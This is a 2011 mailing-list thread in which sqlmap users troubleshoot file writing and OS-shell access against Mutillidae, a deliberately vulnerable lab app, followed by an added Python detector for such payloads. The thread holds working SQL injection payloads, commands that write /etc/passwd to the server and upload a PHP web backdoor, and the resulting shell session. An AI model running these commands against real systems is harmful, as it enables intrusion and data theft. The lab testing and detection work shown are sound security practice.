Hi Bernardo

I'm not sure what you mean when you say that the POST parameters are
invalid.  I tried the following:

C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti
llidae/index.php?page=user-info.php" --data "username=foo&password=bar
&user-info-php-submit-button=View+Account+details" -p "username" --os-shell

and the following occurs:

[11:31:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:31:47] [INFO] going to use a web backdoor for command prompt
[11:31:47] [INFO] fingerprinting the back-end DBMS operating system
[11:31:48] [INFO] the back-end DBMS operating system is Windows
[11:31:48] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
ub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload th
e agent [Enter for None]: C:\wamp\www\mutillidae
[11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/
mutillidae'
[11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/
mutillidae/mutillidae'
[11:32:08] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 2 times
[11:32:08] [INFO] Fetched data logged to text files under 'C:\Program
Files\sqlmap-0.9\output\localhost'

[*] shutting down at 11:32:08

Could it be to do with:

[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
ub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload th
e agent [Enter for None]: C:\wamp\www\mutillidae

Regards

Chris

On 6 July 2011 23:52, Bernardo Damele A. G. <bernardo.dam...@gmail.com> wrote:

> Hi Chris,
>
> No worries.
> If you want command execution, sqlmap can handle it automatically also
> when it's MySQL and you've got a writable folder within the document
> root, --os-cmd and --os-shell. Also, --os-pwn can work in this
> scenario too.
> The file stager uploaded is 0KB because you provide invalid values to
> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
> upload the file stager against MySQL.
>
> See:
> --8<--
> $ python sqlmap.py -u
> "http://debian32/mutillidae/index.php?page=user-info.php" --data
> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1
> --os-shell --flush-session
>
>    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> tool
>    http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 23:49:52
>
> [23:49:52] [INFO] setting file for logging HTTP traffic
> [23:49:52] [INFO] using
>
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> as session file
> [23:49:52] [INFO] flushing session file
> [23:49:52] [INFO] testing connection to the target url
> [23:49:52] [INFO] heuristics detected web page charset 'ascii'
> [23:49:52] [INFO] testing if the url is stable, wait a few seconds
> [23:49:53] [INFO] url is stable
> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not
> dynamic
> [23:49:53] [INFO] heuristic test shows that POST parameter
> 'view_user_name' might be injectable (possible DBMS: MySQL)
> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> HAVING clause'
> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND
> error-based - WHERE or HAVING clause' injectable
> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11
> AND time-based blind' injectable
> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> query (NULL) - 1 to 10 columns' injectable
> POST parameter 'view_user_name' is vulnerable. Do you want to keep
> testing the others? [y/N]
> sqlmap identified the following injection points with a total of 30
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: view_user_name
>     Type: error-based
>    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>    Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033)
> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit
>
>    Type: UNION query
>    Title: MySQL UNION query (NULL) - 1 to 10 columns
>     Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL,
>
> CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113)
> AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND
> 'TOwv'='TOwv&password=adminpass&Submit_button=Submit
>
>    Type: AND/OR time-based blind
>    Title: MySQL > 5.0.11 AND time-based blind
>    Payload: view_user_name=admin' AND SLEEP(5) AND
> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit
> ---
>
> [23:51:31] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.2.6, Apache 2.2.9
> back-end DBMS: MySQL 5.0
> [23:51:31] [INFO] going to use a web backdoor for command prompt
> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system
> [23:51:31] [INFO] the back-end DBMS operating system is Linux
> [23:51:31] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] PHP (default)
> [4] JSP
> >
> [23:51:32] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [/var/www/]:
> [23:51:32] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload
> the agent [Enter for None]: /var/www/test
> [23:51:35] [WARNING] unable to upload the file stager on '/var/www'
> [23:51:35] [INFO] the file stager has been successfully uploaded on
> '/var/www/test' - http://debian32:80/test/tmpugbmo.php
> [23:51:35] [INFO] the backdoor has probably been successfully uploaded
> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
> os-shell> id
> do you want to retrieve the command standard output? [Y/n/a]
> command standard output:    'uid=33(www-data) gid=33(www-data)
> groups=33(www-data)'
>
> os-shell> pwd
> do you want to retrieve the command standard output? [Y/n/a]
> command standard output:    '/var/www/test'
>
> os-shell> exit
> [23:51:44] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 1 times
> [23:51:44] [INFO] Fetched data logged to text files under
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'
>
> [*] shutting down at 23:51:44
> --8<--
>
> Cheers,
> Bernardo
>
>
> On 6 July 2011 23:46,  <christopher.oak...@gmail.com> wrote:
> > Hi
> >
> > Thanks. It turns out I was being an idiot. With absolute paths I didn't
> realise that this also includes the destination file name. With that
> included, it works like a dream.
> >
> > What I haven't managed to get going properly yet is the --os-cmd flag.
> The temp stager file does appear, but is empty, 0KB. However; I think I'll
> save that one for another day!
> >
> > Regards
> >
> > Chris
> > ------------------
> >
> > -----Original Message-----
> > From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com>
> > Date: Wed, 6 Jul 2011 23:42:22
> > To: Chris Oakley<christopher.oak...@gmail.com>
> > Cc: <sqlmap-users@lists.sourceforge.net>
> > Subject: Re: [sqlmap-users] File Writing
> >
> > Hi Chris,
> >
> > To me it works well:
> > --8<--
> > $ python sqlmap.py -u
> > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
> > view_user_name --risk 3 --level 3 --parse-errors --file-write
> > /etc/passwd --file-dest /tmp/test --flush-session
> >
> >    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> tool
> >    http://sqlmap.sourceforge.net
> >
> > [!] legal disclaimer: usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility
> > to obey all applicable local, state and federal laws. Authors assume
> > no liability and are not responsible for any misuse or damage caused
> > by this program
> >
> > [*] starting at 23:26:35
> >
> > [23:26:35] [INFO] setting file for logging HTTP traffic
> > [23:26:35] [INFO] testing connection to the target url
> > [23:26:35] [INFO] heuristics detected web page charset 'ascii'
> > [23:26:35] [INFO] searching for forms
> > [#1] form:
> > POST http://debian32:80/mutillidae/index.php?page=user-info.php
> > POST data: view_user_name=&password=&Submit_button=Submit
> > do you want to test this form? [Y/n/q]
> >>
> > Edit POST data [default:
> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
> > detected):
> > do you want to fill blank fields with random values? [Y/n]
> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you
> > provided is not inside the GET
> > [23:26:37] [INFO] using
> >
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> > as session file
> > [23:26:37] [INFO] flushing session file
> > [23:26:37] [INFO] using
> >
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> > as results file
> > [23:26:37] [INFO] heuristics detected web page charset 'ascii'
> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds
> > [23:26:38] [INFO] url is stable
> > [23:26:38] [INFO] heuristic test shows that POST parameter
> > 'view_user_name' might be injectable (possible DBMS: MySQL)
> > [23:26:38] [INFO] testing sql injection on POST parameter
> 'view_user_name'
> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> clause'
> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> > clause (Generic comment)'
> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
> > blind - WHERE or HAVING clause (Generic comment)' injectable
> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> > HAVING clause'
> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
> > HAVING clause'
> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
> clause'
> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
> clause'
> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
> > error-based - WHERE or HAVING clause' injectable
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
> query)'
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> > [23:26:43] [INFO] target url appears to be UNION injectable with 4
> columns
> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> > query (NULL) - 1 to 10 columns' injectable
> > [23:26:43] [WARNING] in OR boolean-based injections, please consider
> > usage of switch --drop-set-cookie if you experience any problems
> > during data retrieval
> > POST parameter 'view_user_name' is vulnerable. Do you want to keep
> > testing the others? [y/N]
> > sqlmap identified the following injection points with a total of 148
> > HTTP(s) requests:
> > ---
> > Place: POST
> > Parameter: view_user_name
> >    Type: boolean-based blind
> >    Title: OR boolean-based blind - WHERE or HAVING clause (Generic
> comment)
> >    Payload: view_user_name=-5244' OR NOT (1884=1884)--
> > &password=bDXj&Submit_button=Submit
> >
> >    Type: error-based
> >    Title: MySQL OR error-based - WHERE or HAVING clause
> >    Payload: view_user_name=-3024' OR 1 GROUP BY
> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
> > &password=bDXj&Submit_button=Submit
> >
> >    Type: UNION query
> >    Title: MySQL UNION query (NULL) - 1 to 10 columns
> >    Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
> >
> CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
> > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
> > NULL#&password=bDXj&Submit_button=Submit
> > ---
> >
> > do you want to exploit this SQL injection? [Y/n]
> > [23:26:46] [INFO] testing MySQL
> > [23:26:46] [INFO] confirming MySQL
> > [23:26:46] [INFO] the back-end DBMS is MySQL
> >
> > web application technology: PHP 5.2.6, Apache 2.2.9
> > back-end DBMS: MySQL >= 5.0.0
> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system
> > [23:26:46] [INFO] the back-end DBMS operating system is Linux
> > [23:26:46] [WARNING] if the problem persists with 'None' values please
> > try to use hidden switch --no-cast (fixing problems with some
> > collation issues)
> > do you want confirmation that the file '/tmp/test' has been
> > successfully written on the back-end DBMS file system? [Y/n]
> > [23:26:48] [INFO] the file has been successfully written and its size
> > is 1848 bytes, but the size differs from the local file '/etc/passwd'
> > (1845 bytes)
> > [23:26:48] [WARNING] expect junk characters inside the file as a
> > leftover from UNION query
> > [23:26:48] [INFO] you can find results of scanning in multiple targets
> > mode inside the CSV file
> >
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> >
> > [*] shutting down at 23:26:48
> > --8<--
> >
> > Cheers,
> > Bernardo
> >
> >
> > On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote:
> >> Hi
> >>
> >> I'm playing with file writing.  I have a full privs root user set up in
> >> mysql and am using
> >>
> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> >> to play with.  I've set up a /temp folder below the web root of the app.
> >> I've put a file "evil.php" in the sqlmap working directory.  I've also
> >> changed the permissions for all users on the temp folder to write access
> >> allowed.
> >>
> >> I'm using the following input to try and upload this file:
> >>
> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
> >> "http://localhost/mutillidae/ind
> >> ex.php?page=user-info.php" --data
> >> "username=&password=&user-info-php-submit-butt
> >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"
> >> --file-wr
> >> ite "evil.php" --file-dest "temp/evil.php"
> >>
> >> This is with the latest dev build by the way.
> >>
> >> The output I get is:
> >>
> >> [18:00:03] [INFO] the back-end DBMS is MySQL
> >> web server operating system: Windows
> >> web application technology: PHP 5.3.5, Apache 2.2.17
> >> back-end DBMS: MySQL 5.0
> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> >> [18:00:04] [WARNING] if the problem persists with 'None' values please
> try
> >> to us
> >> e hidden switch --no-cast (fixing problems with some collation issues)
> >> do you want confirmation that the file 'temp/evil.php' has been
> successfully
> >> wri
> >> tten on the back-end DBMS file system? [Y/n]
> >> [18:00:12] [WARNING] it looks like the file has not been written, this
> can
> >> occur
> >>  if the DBMS process' user has no write privileges in the destination
> path
> >> [18:00:12] [WARNING] expect junk characters inside the file as a
> leftover
> >> from U
> >> NION query
> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
> >> Files\sqlm
> >> ap-0.9\output\localhost'
> >>
> >> [*] shutting down at 18:00:12
> >>
> >> and sure enough the file isn't written.  I've also tried using the
> --no-cast
> >> switch, to no avail.
> >>
> >> Does anyone have any ideas on what could be going wrong here?  I can use
> the
> >> --file-read switch to read any file such as C:\boot.ini.  The --os-cmd
> and
> >> --os-pwn commands also fail at the stager upload phase, probably for
> similar
> >> reasons.
> >>
> >> Any help would be appreciated
> >>
> >> Cheers
> >>
> >> Chris
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> All of the data generated in your IT infrastructure is seriously
> valuable.
> >> Why? It contains a definitive record of application performance,
> security
> >> threats, fraudulent activity, and more. Splunk takes this data and makes
> >> sense of it. IT sense. And common sense.
> >> http://p.sf.net/sfu/splunk-d2d-c2
> >>_______________________________________________
> >> sqlmap-users mailing list
> >> sqlmap-users@lists.sourceforge.net
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
> >
> >
> >
> > --
> > Bernardo Damele A. G.
> >
> > E-mail / Jabber: bernardo.damele (at) gmail.com
> > Mobile: +447788962949 (UK 07788962949)
> > PGP Key ID: Unavailable
> >
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>
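As an added defender-side example (not code from this thread or from sqlmap): a small Python classifier that URL-decodes and CHAR()-decodes POST bodies of the shape quoted above, recovers the delimiter markers sqlmap hides inside CHAR() calls, and tags the injection indicators a WAF rule or log review would look for, including the INTO OUTFILE write that the file stager upload discussed in the thread depends on. The sample bodies are constructed, and the placeholder stager string, the indicator names and the marker heuristic are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample POST bodies (not real traffic), modelled on the payload
# shapes quoted in the thread: sqlmap's error-based, UNION and time-based
# probes, plus a generic INTO OUTFILE write of the kind the --file-write /
# --os-shell stager upload relies on against MySQL.
SAMPLE_BODIES = [
    "view_user_name=admin&password=adminpass&Submit_button=Submit",
    "view_user_name=admin' AND (SELECT 3033 FROM(SELECT COUNT(*),"
    "CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) THEN 1 ELSE 0 END)),"
    "CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
    "GROUP BY x)a) AND 'ekpw'='ekpw&password=adminpass&Submit_button=Submit",
    "view_user_name=admin' UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,108,114,100,58),"
    "IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) AS CHAR),CHAR(32)),"
    "CHAR(58,116,116,115,58)), NULL# AND 'TOwv'='TOwv&password=adminpass&Submit_button=Submit",
    "view_user_name=admin%27+AND+SLEEP%285%29+AND+%27BfoH%27%3D%27BfoH"
    "&password=adminpass&Submit_button=Submit",
    "view_user_name=x' UNION ALL SELECT NULL,NULL,'PLACEHOLDER_STAGER_BODY',NULL "
    "INTO OUTFILE '/var/www/test/tmp.php' LIMIT 1#&password=x&Submit_button=Submit",
]

# MySQL CHAR(n,n,...) builds a string from byte values; sqlmap wraps the data it
# extracts in CHAR()-built delimiters (e.g. CHAR(58,108,114,100,58) = ':lrd:').
CHAR_CALL = re.compile(r"CHAR\(((?:\d+\s*,\s*)*\d+)\)", re.IGNORECASE)

INDICATORS = {
    "file_write": re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I),
    "union_probe": re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "time_based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "error_based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
}
# Heuristic (assumption): three lowercase letters between colons, which only
# becomes visible once the CHAR() calls have been decoded.
MARKER = re.compile(r":[a-z]{3}:")


def decode_char_calls(sql: str) -> str:
    """Replace every CHAR(n,n,...) call with the literal string it builds."""
    return CHAR_CALL.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), sql)


def classify_body(raw_body: str) -> dict:
    """URL-decode and CHAR()-decode a POST body, then tag SQLi indicators."""
    decoded = decode_char_calls(unquote_plus(raw_body))
    hits = {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    markers = sorted(set(MARKER.findall(decoded)))
    if markers:
        hits.add("delimiter_markers")
    return {"indicators": sorted(hits), "markers": markers, "decoded": decoded}


def scan(bodies):
    """Return (index, indicator list) for every body that tripped a rule."""
    flagged = []
    for i, body in enumerate(bodies):
        result = classify_body(body)
        if result["indicators"]:
            flagged.append((i, result["indicators"]))
    return flagged


if __name__ == "__main__":
    for i, inds in scan(SAMPLE_BODIES):
        print(i, inds, classify_body(SAMPLE_BODIES[i])["markers"])
```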
